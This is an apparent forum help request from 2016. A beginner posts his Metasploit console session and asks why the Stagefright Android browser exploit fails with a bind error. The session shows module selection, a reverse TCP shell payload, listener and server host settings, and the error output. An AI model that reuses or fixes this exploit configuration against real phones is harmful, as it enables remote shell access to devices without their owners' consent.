Metasploit: EXPLOIT FAIL to BIND

Dec 13, 2016 06:16 PM

HI all,

I am new to Metasploit. Using Kali Rolling: Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux.

I am trying to hack my own phone(Andriod Kitkat) using Andriod Exploit stagefrightmp4tx3g_64bit . In my router i have done port forwarding for port 4444 ,8080,443,80 for my Local IP to the laptop i am connected.

I execute below steps on machine to get a meterpreter session with my phone But failed

10.0.0.224 Is my Internal IP

174.60.173.11 is my external IP

msf > use exploit/android/browser/stagefrightmp4tx3g_64bit

msf exploit(stagefrightmp4tx3g64bit) > set payload linux/armle/shellreverse_tcp

payload => linux/armle/shellreversetcp

msf exploit(stagefrightmp4tx3g_64bit) > set lhost 10.0.0.224

lhost => 10.0.0.224

msf exploit(stagefrightmp4tx3g_64bit) > set lport 8080

lport => 8080

msf exploit(stagefrightmp4tx3g_64bit) > set SRVHOST 174.60.173.11

SRVHOST => 174.60.173.11

msf exploit(stagefrightmp4tx3g_64bit) > set SRVPORT 8080

SRVPORT => 8080

msf exploit(stagefrightmp4tx3g_64bit) > show options

Module options (exploit/android/browser/stagefrightmp4tx3g_64bit):

Name Current Setting Required Description

---- --------------- -------- -----------

SRVHOST 174.60.173.11 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0

SRVPORT 8080 yes The local port to listen on.

SSL false no Negotiate SSL for incoming connections

SSLCert no Path to a custom SSL certificate (default is randomly generated)

URIPATH no The URI to use for this exploit (default is random)

Payload options (linux/armle/shellreversetcp):

Name Current Setting Required Description

---- --------------- -------- -----------

LHOST 10.0.0.224 yes The listen address

LPORT 8080 yes The listen port

Exploit target:

Id Name

-- ----

0 Automatic

msf exploit(stagefrightmp4tx3g_64bit) > exploit

* Exploit running as background job.

* Started reverse TCP handler on 10.0.0.224:8080

  • Exploit failed bad-config: Rex::BindFailed The address is already in use or unavailable: (174.60.173.11:8080).

msf exploit(stagefrightmp4tx3g64bit) > dbstatus

* postgresql connected to msf

msf exploit(stagefrightmp4tx3g_64bit) >

msf exploit(stagefrightmp4tx3g_64bit) > jobs

Jobs

====

No active jobs.

Apache2 is status is dead (Inactive) in back .

Please help me on this. What i am doing wrong.

When i tried to do exploit on INTERNAL IP ,the using EXTERNAL IP , exploit run successfully i got generated URL.

Related Articles

637263493835297420.jpg

How to Use Zero-Width Characters to Hide Secret Messages in Text (& Even Reveal Leaks)

636455706472146367.jpg

How to Hide DDE-Based Attacks in MS Word

Comments

No Comments Exist

Be the first, drop a comment!